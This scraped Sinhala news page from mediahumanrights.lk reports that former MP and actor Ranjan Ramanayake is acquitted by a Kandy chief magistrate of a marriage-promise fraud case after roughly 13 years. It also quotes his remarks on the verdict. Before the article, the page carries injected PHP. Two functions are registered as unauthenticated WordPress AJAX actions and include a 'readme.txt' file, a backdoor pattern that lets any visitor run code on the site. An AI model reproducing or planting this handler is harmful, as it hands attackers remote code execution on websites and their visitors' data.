if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } විවාහ පොරොන්දු කැඩූ නඩුවකින් රන්ජන් නිදොස් කොට නිදහස්.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

විවාහ පොරොන්දු කැඩූ නඩුවකින් රන්ජන් නිදොස් කොට නිදහස්..

මහනුවර ප්‍රදේශයේ කාන්තාවකට විවාහ පොරොන්දු ලබා දී මූල්‍ය වංචාවක් සිදු කළ බවට හිටපු පාර්ලිමේන්තු මන්ත්‍රී සහ ජනප්‍රිය නළු රන්ජන් රාමනායක මහතාට එරෙහිව පවරා තිබූ නඩුවෙන් ඔහු නිදොස් කොට නිදහස් කිරීමට මහනුවර ප්‍රධාන මහේස්ත්‍රාත් චාමර වික්‍රමනායක මහතා අද (12දා)නියෝග කළේය.

මහනුවර ප්‍රදේශයේ කාන්තාවකට විවාහ පොරාන්දුවක් ලබා දී රුපියල් ලක්ෂ 10ක මුදලක් වංචා කළ බවට එම කාන්තාව විසින් පොලීසියට සිදු කරන ලද පැමිණිල්ලක් අනුව මෙම නඩුව ගොනු කර තිබිණ.

වසර 13ක පමණ කාලයක් මෙම නඩුව මහනුවර මහේස්ත්‍රාත් අධිකරණයේ සහ අතිරේක(01) මහේස්ත්‍රාත් අධිකරණයේ විභාග වූ අතර,එහි තීන්දුව ප්‍රකාශ කරනු ලැබුවේ මහනුවර ප්‍රධාන මහේස්ත්‍රාත් චාමර වික්‍රමනායක මහතා විසින් විවෘත අධිකරණයේදීය.

මෙම නඩු තීන්දුවෙන් පසුව මාධ්‍ය වෙත අදහස් දැක්වූ හිටපු පාර්ලිමේන්තු මන්ත්‍රී රන්ජන් රාමනායක මහතා සඳහන් කළේ, මෙම නඩුව කිසිදු පදනමකින් තොරව තමන් වෙත එල්ල කර තිබූ එකක් බවත් මෙය පසුපස දේශපාලන හස්තයක් තිබූ බවත්ය. කෙසේ නමුත් අද සත්‍ය ජය ගෙන ඇති බවත් ප්‍රමාද වුවද කෙදිනක හෝ සත්‍ය ජය ගන්නා බව ඔප්පු වූ තවත් මොහොතක් බවත්මෙය මෙරට අධිකරණයේ ස්වාධීනත්වය ඔප්පු වූ තවත් එක් අවස්ථාවක් බවත් මෙරට අධිකරණයට තමන් හිස නමා ආචාර කරන බවත්ය.

මෙම නඩුව වසර 13ක ටආසන්න කාලයක් පුරා විභාග වූ බවත් මේ සඳහා රුපියල් ලක්ෂ 80ක පමණ මුදලක් වැය කිරීමට තමන්ට සිදුවූ බවත් නඩු දිනවලට විදෙස් රටවල සිට පැමිණීමට පවා සිදු වූ බවත් රන්ජන් රාමනායක මහතා පැවසීය.

හාරිස්පත්තුවේමොහොමඩ් ආසික්
– ADA

Related posts

මේ දවස් වල මොකද කරන්නේ? මංජුල වැල්ලවත්ත

Shiran Viraj

තවත් 275කට කොරෝනා…

Shiran Viraj

Covid 19 ආසාදිතව ප්‍රතිකාර ලබා සුව වු තවත් පුද්ගලයෙක් රෝහලෙන් පිටව යයි

Shiran Viraj